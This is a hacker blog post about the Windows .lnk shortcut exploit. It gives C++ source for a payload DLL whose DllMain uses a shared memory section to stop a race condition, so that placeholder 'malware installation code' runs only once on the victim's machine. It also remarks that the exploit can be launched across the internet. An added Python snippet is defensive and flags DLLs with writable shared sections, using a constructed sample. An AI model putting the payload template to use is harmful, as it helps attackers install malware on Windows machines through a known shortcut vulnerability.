Windows Link exploit (shortcut file) race condition tackling -- "vinnu"

    Team : Legion Of Xtremers / Garage4Hackers
    author : "vinnu"
    Greetz : Prashant Uniyal, b0nd, D4rk457, and Secfence team.
    Exploit path : http://www.exploit-db.com/exploits/14403/
    Exploit by : Ivanlef0u


    The .lnk exploit retrieves a DLL from a remote machine and executes it while the icon
    for the shortcut (.lnk file) is being resolved.

    The race condition:
    The .lnk exploitation suffers from a race condition: the downloaded DLL is loaded and executed
    three times simultaneously. This hinders proper exploitation of the victim whenever the payload DLL
    tries to write a file to disk or tries to access and change any other resource on the victim
    system.
    The first thing to note is that the .lnk exploit is in effect an undocumented DLL-injection
    technique.
    The .lnk file retrieves a file with a .dll, .cpl or .ocx extension; all of these are
    legitimate dynamic libraries with a DllMain() defined.

    The race condition needs to be resolved inside this retrieved DLL.
    In this example we download and execute x.dll.
    The sample DLL code is as follows (suppose 'x' is the project name):

    /* ------------x.cpp--------------------*/
    #include <windows.h>   // must come before shellapi.h; also declares BOOL, DWORD, LPVOID
    #include <shellapi.h>

    #pragma data_seg(".xdat") // Shared memory section to tackle the race condition;
    bool xcheck = false;      // the variable must be initialized to be placed in it
    #pragma data_seg()

    void x() {
        // The exploit worked, now install the malware.
        // Place all malware installation code here:
        // the code that accesses resources,
        // like file creation etc...
    }

    void in() { // This routine will handle the race condition
        if (xcheck == false) { // If false then set it true and access the resources,
            xcheck = true;     // otherwise just exit the routine.
            x();
        }
    }

    BOOL APIENTRY DllMain(HANDLE hModule,
                          DWORD ul_reason_for_call,
                          LPVOID lpReserved)
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            in();
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }
    /*----------end of file-----------------*/

    An x.DEF file is also needed and must be added to the project workspace.
    This file defines the attributes of the custom memory section (the name must match the one given to data_seg):

    SECTIONS
    .xdat READ WRITE SHARED

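    As an added triage example (not part of the original post or of the exploit), the following Python walks the PE section table of a .dll/.cpl/.ocx by hand and flags any section mapped both WRITE and SHARED, which is exactly what the ".xdat READ WRITE SHARED" line above produces. It runs on a constructed header-only sample built inline, not on a real binary; shared writable sections are unusual in ordinary DLLs, so the flag is a triage signal for a retrieved library, not proof of anything by itself.

```python
import struct

# Section Characteristics flags (IMAGE_SCN_*) from the PE/COFF format
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_SHARED = 0x10000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def parse_sections(pe):
    """Return [(name, characteristics)] for every entry in the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                        # COFF file header starts after the signature
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size               # section table follows the optional header
    out = []
    for i in range(num_sections):
        off = table + i * 40                   # each section header is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        out.append((name, struct.unpack_from("<I", pe, off + 36)[0]))
    return out

def shared_writable_sections(pe):
    """Sections mapped WRITE and SHARED, i.e. what '.xdat READ WRITE SHARED' in a .DEF produces."""
    want = IMAGE_SCN_MEM_SHARED | IMAGE_SCN_MEM_WRITE
    return [n for n, c in parse_sections(pe) if c & want == want]

def build_sample_pe(sections):
    """Constructed header-only PE image for testing (not a real binary): DOS stub, COFF header, section table."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)      # e_lfanew: PE signature immediately after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x2102)  # i386, DLL, no optional header
    hdrs = b"".join(n.ljust(8, b"\0") + b"\0" * 28 + struct.pack("<I", c) for n, c in sections)
    return bytes(dos) + b"PE\0\0" + coff + hdrs

RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
SAMPLE_DLL = build_sample_pe([          # constructed sample mirroring the x.dll layout above
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | RW),
    (b".xdat", IMAGE_SCN_CNT_INITIALIZED_DATA | RW | IMAGE_SCN_MEM_SHARED),
])

if __name__ == "__main__":
    print(shared_writable_sections(SAMPLE_DLL))  # ['.xdat']
```
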
    There exist more ways to tackle the race condition, such as mutexes, semaphores etc.
    The same exploit can also be made cross-browser and launched via the internet.

    But try it a little yourself. I'll tell you later...."vinnu"

    [Study the exploit to learn more about the above discussion. The link has been provided above.]
    This article was originally published in blog: Windows Link exploit (shortcut file) race condition tackling--"vinnu" started by prashant_uniyal